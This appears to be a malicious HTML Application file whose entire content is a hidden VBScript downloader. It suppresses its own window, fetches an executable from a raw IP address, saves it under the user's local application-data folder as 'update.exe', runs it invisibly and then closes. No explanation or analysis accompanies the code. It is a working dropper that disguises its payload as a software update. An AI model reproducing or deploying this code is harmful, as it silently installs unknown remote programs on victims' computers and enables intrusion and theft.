<html><head><HTA:APPLICATION WINDOWSTATE="minimize" SHOWININTASKBAR="no" CAPTION="no" BORDER="none"/><script language="VBScript">Set s=CreateObject("WScript.Shell"):Set x=CreateObject("WinHttp.WinHttpRequest.5.1"):x.Open "GET","http://45.131.214.63/Our.exe",0:x.Send:If x.Status=200 Then:Set y=CreateObject("ADODB.Stream"):y.Type=1:y.Open:y.Write x.ResponseBody:y.SaveToFile s.ExpandEnvironmentStrings("%LOCALAPPDATA%")&"\update.exe",2:y.Close:s.Run s.ExpandEnvironmentStrings("%LOCALAPPDATA%")&"\update.exe",0,0:End If:window.close()</script></head><body></body></html>
